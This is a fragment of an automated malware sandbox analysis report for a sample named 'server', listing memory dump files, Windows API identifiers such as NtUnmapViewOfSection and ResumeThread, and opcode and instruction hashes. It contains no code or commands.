              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Key2Load
              • String ID:
              • API String ID: 2615624000-0
              • Opcode ID: 9d888eb0dacabc403f276da66f7c87685d0d36e23215ca0c6e3458eb872e6301
              • Instruction ID: 94f4de1529b8b50742e3c3dc958c1fa5c5037f4716a896b2a115e6acfd9189e5
              • Opcode Fuzzy Hash: 9d888eb0dacabc403f276da66f7c87685d0d36e23215ca0c6e3458eb872e6301
              • Instruction Fuzzy Hash: D59002E0D10100AEAD0497E09D0DC37752CE5C078131045487002C2010A5655805C630
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: OpenSection
              • String ID:
              • API String ID: 1950954290-0
              • Opcode ID: 783fd4892fd18f064b4694e914461d1484d2bfb0b84a936dc55f194faa35e01d
              • Instruction ID: 15ee953fb5d8a969495a51deaabceed93fa42db23d647f8d4d3bdd112d04972d
              • Opcode Fuzzy Hash: 783fd4892fd18f064b4694e914461d1484d2bfb0b84a936dc55f194faa35e01d
              • Instruction Fuzzy Hash: 979002E0810241AEAE4497E29D0DD37272CD7C0F053044688B001C641096646841C530
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: BuffersFileFlush
              • String ID:
              • API String ID: 1685522069-0
              • Opcode ID: ca0260608e9759b8636b1f165a85ee94743b961b40d496f71f1b24735678e82f
              • Instruction ID: 8b93b7f03f0bb275c67c49d3759e63a5ed5bf0eee84429e516505d66ecb2b6fe
              • Opcode Fuzzy Hash: ca0260608e9759b8636b1f165a85ee94743b961b40d496f71f1b24735678e82f
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ExtendSection
              • String ID:
              • API String ID: 1258755343-0
              • Opcode ID: 92575d7bca8d7bcd0830f3e30ea783a3d814ff7edd9f6180f60ff1ae0a38fef6
              • Instruction ID: 5d0da67df594d1aed39d990a317dcc16e967d709a17b4ab69461b296b9fdd6d3
              • Opcode Fuzzy Hash: 92575d7bca8d7bcd0830f3e30ea783a3d814ff7edd9f6180f60ff1ae0a38fef6
              • Instruction Fuzzy Hash:
              APIs
              • NtUnmapViewOfSection.NTDLL ref: 00A19875
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: SectionUnmapView
              • String ID:
              • API String ID: 498011366-0
              • Opcode ID: 74288e299c5010e40e28da4cb24b4c02585bf6df3335bd9643bf3ecea45c8992
              • Instruction ID: d581a8454040183f7f55198957a7bfb7e83efe9971c33f2fc2e198d82391f5ce
              • Opcode Fuzzy Hash: 74288e299c5010e40e28da4cb24b4c02585bf6df3335bd9643bf3ecea45c8992
              • Instruction Fuzzy Hash:
              APIs
              • NtQueryFullAttributesFile.NTDLL ref: 00A19859
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: AttributesFileFullQuery
              • String ID:
              • API String ID: 3545844373-0
              • Opcode ID: 7d753ee8524bfca4f5d9a0cc9fa71f8d63075e4a52d012b04afee10b99f93baf
              • Instruction ID: da99e4079478525216236fa421d741c8dbad004e690a977a96e5f18b0c44606e
              • Opcode Fuzzy Hash: 7d753ee8524bfca4f5d9a0cc9fa71f8d63075e4a52d012b04afee10b99f93baf
              • Instruction Fuzzy Hash:
              APIs
              • NtQueryAttributesFile.NTDLL ref: 00A19AF1
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: AttributesFileQuery
              • String ID:
              • API String ID: 2106648053-0
              • Opcode ID: 066b00b3ac7e481219bb415d0a632d23e9e0072cd759e8aee3954d1cedc81b11
              • Instruction ID: c1faec2b6f52836e104efb1f9d30d351b4cb4546ad141da8b401184068f69d30
              • Opcode Fuzzy Hash: 066b00b3ac7e481219bb415d0a632d23e9e0072cd759e8aee3954d1cedc81b11
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 49e637a8ce2f5cebf1ea3708752a456c8bcc4e3a4a518977d2305f24d8c1739a
              • Instruction ID: 6d7bc9c68617bec70b9af704d6226d2360df82c5cd423961a9038629d972c08e
              • Opcode Fuzzy Hash: 49e637a8ce2f5cebf1ea3708752a456c8bcc4e3a4a518977d2305f24d8c1739a
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Flush
              • String ID:
              • API String ID: 1965063083-0
              • Opcode ID: d6cf66d29351391273243f6eed5ffcd9b8ba66cd254d312e44cd782d62cd5c97
              • Instruction ID: 94b25eb200da5c0f391715b1791fc267f6021844131c91616eac276e33bb4d60
              • Opcode Fuzzy Hash: d6cf66d29351391273243f6eed5ffcd9b8ba66cd254d312e44cd782d62cd5c97
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Delete
              • String ID:
              • API String ID: 1035893169-0
